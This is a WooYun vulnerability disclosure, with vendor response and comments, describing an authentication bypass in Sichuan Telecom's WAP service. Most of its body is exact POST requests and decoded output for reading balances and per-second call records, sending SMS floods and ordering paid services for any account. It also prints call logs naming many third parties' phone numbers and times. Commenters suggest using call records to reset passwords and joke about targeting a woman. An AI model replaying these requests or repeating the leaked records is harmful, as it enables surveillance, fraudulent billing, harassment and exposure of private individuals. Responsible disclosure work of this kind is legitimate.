当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019542

漏洞标题:四川电信绕过密码校验查询用户的账单、通话详单、短信详单、上网详单及其他各种信息(非暴力破解)

相关厂商:四川电信

漏洞作者: O.o

提交时间:2013-03-05 10:46

修复时间:2013-04-19 10:47

公开时间:2013-04-19 10:47

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-05: 细节已通知厂商并且等待厂商处理中
2013-03-07: 厂商已经确认,细节仅向厂商公开
2013-03-10: 细节向第三方安全合作伙伴开放
2013-05-01: 细节向核心白帽子及相关领域专家公开
2013-05-11: 细节向普通白帽子公开
2013-05-21: 细节向实习白帽子公开
2013-04-19: 细节向公众公开

简要描述:

标题够长么?电信的攻城狮就是个坑啊!关键利用工具自产,暂不流出。cncert求20!

详细说明:

利用利用工具进行手机号生成对应的用户ID
18980000000
======SC189Checker======
=========Encode=========
7B2AE77D404FD32D62E2E786BA69E990
==========DONE==========
返回信息加过密,自己写了个利用工具进行解密。
获取用户流量信息
POST HTTP://wapsc.189.cn:8006/wapLogin/getFlow.action
Post值:
accountid=用户ID &channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png


.png


======SC189Checker======
=========Decode=========
{"overFlow":"4180643","totalFlow":"4194304","unit":"kb","useFlow":"13661"}
==========DONE==========
登陆客户端发短信(直接形成短信轰炸)
POST HTTP://wapsc.189.cn:8006/wapLogin/sendSms.action
数据:
accountid=xxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
查询余额
POST HTTP://wapsc.189.cn:8006/wapLogin/getReal.action
数据
accountid=xxxxxxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png


======SC189Checker======
=========Decode=========
{"balanceMsg":"428.94","realMsg":"170.00"}
==========DONE==========
基础业务情况
POST HTTP://wapsc.189.cn:8006 /BasicBuss/getAllBasicBusiness.action
accNbr=xxxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png


======SC189Checker======
=========Decode=========
[{"accNbr":null,"basicBuinessId":"629","basicBuinessName":"鏉ョ數鏄剧ず","isOrder":"1"},{"accNbr":null,"basicBuinessId":"631","basicBuinessName":"鍛煎彨绛夊緟","isOrder":"1"},{"accNbr":null,"basicBuinessId":"628","basicBuinessName":"褰╅搩","isOrder":"1"},{"accNbr":null,"basicBuinessId":"624","basicBuinessName":"閬囧繖鍓嶈浆","isOrder":"0"},{"accNbr":null,"basicBuinessId":"625","basicBuinessName":"鏃犲簲绛斿墠杞?,"isOrder":"1"},{"accNbr":null,"basicBuinessId":"602","basicBuinessName":"鍥介檯婕父璇煶鐭俊","isOrder":"1"},{"accNbr":null,"basicBuinessId":"622","basicBuinessName":"鍥介檯婕父鏁版嵁涓氬姟","isOrder":"0"},{"accNbr":null,"basicBuinessId":"660","basicBuinessName":"鍥介檯婕父WIFI","isOrder":"0"}]
==========DONE==========
自学java=。=编码蛋疼2b啊~
套餐使用量查询
POST HTTP://wapsc.189.cn:8006/productMessage/mealUseCase.action
数据
accountid=xxxxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png


【通话详单】对,没看错。详单。详细到秒!
POST HTTP://wapsc.189.cn:8006/BillDetails/getBillDetail.action
startTime=20130120&endTime=20130121&accNbr=xxxxxxxxxxxxxxxx&type=21&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png

.png


======SC189Checker======
=========Decode=========
[{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"省内漫游","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川成都","calledNbr":"18708168898","callingAreaCode":"四川南充","duration":"22","endTime":"2013-03-01 10:04:32","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"主叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 10:04:10","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"省内漫游","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川南充","calledNbr":"18681749777","callingAreaCode":"四川南充","duration":"82","endTime":"2013-03-01 10:27:23","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 10:26:01","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"省内漫游","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川南充","calledNbr":"13990883729","callingAreaCode":"四川南充","duration":"29","endTime":"2013-03-01 10:44:43","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 10:44:14","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"省内漫游","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川南充","calledNbr":"18681749777","callingAreaCode":"四川南充","duration":"14","endTime":"2013-03-01 10:56:35","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"主叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 10:56:21","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"省内漫游","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川南充","calledNbr":"13350660000","callingAreaCode":"四川南充","duration":"78","endTime":"2013-03-01 11:52:00","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 11:50:42","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"省内漫游","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川成都","calledNbr":"85198738","callingAreaCode":"四川遂宁","duration":"42","endTime":"2013-03-01 11:56:32","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 11:55:50","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"本地市话","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川南充","calledNbr":"13989198995","callingAreaCode":"四川成都","duration":"66","endTime":"2013-03-01 16:55:07","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 16:54:01","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"本地市话","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川成都","calledNbr":"18708168898","callingAreaCode":"四川成都","duration":"34","endTime":"2013-03-01 17:41:04","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 17:40:30","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"本地市话","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川成都","calledNbr":"85158890","callingAreaCode":"四川成都","duration":"12","endTime":"2013-03-01 18:24:01","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"主叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 18:23:49","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"本地市话","billingType":"","callCharge":"0.00","callDate":"20130301","calledAreaCode":"四川成都","calledNbr":"18628049944","callingAreaCode":"四川成都","duration":"37","endTime":"2013-03-01 19:06:35","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-01 19:05:58","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"},{"accNbr":"18980000000","accumuCharge":"0.00","billingCommunicateType":"本地市话","billingType":"","callCharge":"0.00","callDate":"20130302","calledAreaCode":"四川成都","calledNbr":"18708168898","callingAreaCode":"四川成都","duration":"32","endTime":"2013-03-02 11:33:41","internetFlow":"","latnName":"","longCallCharge":"0.00","longCallType":"被叫","monthNo":"201303","otherCharge":"0.00","preferentialCharge":"0.00","startTime":"2013-03-02 11:33:09","sumCallCharge":"0.00","sumDuration":"0","sumInternetFlow":"0.00MB"}]
==========DONE==========
还有一些远程操纵订购产品
POST HTTP://wapsc.189.cn:8006/businessOperations/getAllValueAdds.action
accountid=xxxxxxxxxxx&pageSize=10&currentPage=1&fuzzyStr=&doType=TYPE1&orderMsg=&isCall=true&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
会返回当前增值业务列表

.png

.png


找到想要开通的服务,记下goodsId
获取产品valueAddId,变量为goodsid
POST HTTP://wapsc.189.cn:8006/businessOperations/BusOperInfo.action HTTP/1.1
accountid=xxxxxxxxxxxxxx&goodsId=100311&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png

.png


返回(QQ加油站为例)
======SC189Checker======
=========Decode=========
{"goodsChannel":"ISMP","goodsCode":"123000000000000000434","goodsDesc":"<p>\n &
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; QQ浼氬憳鏄吘璁殑楂樼澧炲?
涓氬姟鏈嶅姟锛岀敤鎴烽?杩囨墜鏈哄彲浣跨敤鎵嬫満鏌ュ湪绾垮ソ鍙嬨?鎵嬫満鏇存柊澶村
儚銆佸ソ鍙嬩笂绾块?鐭ュ埌鎵嬫満銆佹墜鏈鸿缃甉Q鐐搩銆丵Q瀵嗙爜鎵嬫満瀹夊叏淇
濇姢銆丵Q浼氬憳閫熼?閫氱煡鍒版墜鏈虹瓑鍔熻兘\n<p>\n &nbsp;<\/p>\n<p>\n 娉細
姝や笟鍔″睘浜庝唬鎵h垂锛圫P锛夌被澧炲?涓氬姟銆?\/p>\n\n
","goodsId":"100311","goodsName":"QQ浼氬憳","goodsPrice":"10","service_
Company":"娣卞湷鑵捐鍏徃"}
==========DONE==========
取得goodsCode,
订购任意附属包
POST HTTP://wapsc.189.cn:8006/businessOperations/handleBusiness.action HTTP/1.1
accountid=xxxxxxxxx&valueAddId=123000000000000000434&action=1&doType=ISMP&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png

.png


======SC189Checker======
=========Decode=========
{"effectiveTime":"","expireTime":"20130305103010","message":"鎴愬姛","resultCode
":"0"}
==========DONE==========
订购成功,!

漏洞证明:

请复制详细说明内容~
cncert或者wooyun官方需要我这个2B解码软件做复现请PM我。

修复方案:

你再加密一次试试看啊~

版权声明:转载请注明来源 O.o@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2013-03-07 22:47

厂商回复:

在白帽子的大力配合下,CNVD确认并复现所述情况(含某加密算法的破解),已在7日转由CNCERT四川分中心,由其协调当地基础电信运营企业处置。
按完全影响机密性,部分影响可用性进行评分,基本危害评分8.47,发现技术难度系数1.2(不安全参数引用+加密破解),涉及行业或单位影响系数1.5,综合rank=8.47*1.2*1.5=15.246

最新状态:

2013-03-09:近日,中国电信集团公司亦获知该事件,也同时在关注,预计将进行及时处置。待后续反馈。


漏洞评价:

评论

  1. 2013-03-05 10:59 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    我勒个擦,够严重!印象中有过类似漏洞,这个是升级的?另外我记得某地区移动重置服务密码有个依据,就是最后3次通话记录,“通话详单”这个应该可以利用这个逻辑咯,哎,运营商啊。。。

  2. 2013-03-05 11:16 | O.o ( 普通白帽子 | Rank:105 漏洞数:12 | ส็็็็็็็็็็็็็็็็็็็...)

    @疯狗 电信也可以~

  3. 2013-03-05 11:19 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    没权限认证?

  4. 2013-03-05 11:21 | O.o ( 普通白帽子 | Rank:105 漏洞数:12 | ส็็็็็็็็็็็็็็็็็็็...)

    @xsser 毫无啊~xsser有暗恋的四川电信妹纸么?

  5. 2013-03-05 11:25 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @O.o 有 私聊

  6. 2013-03-05 11:27 | O.o ( 普通白帽子 | Rank:105 漏洞数:12 | ส็็็็็็็็็็็็็็็็็็็...)

    @xsser ok~

  7. 2013-03-05 11:32 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    这也行?

  8. 2013-03-05 11:39 | noah ( 普通白帽子 | Rank:384 漏洞数:40 )

    ......

  9. 2013-03-05 13:32 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    难道是我看见的那个-_-|

  10. 2013-04-19 12:50 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    这个文件夹很乌云思密达,能不卖萌不!!!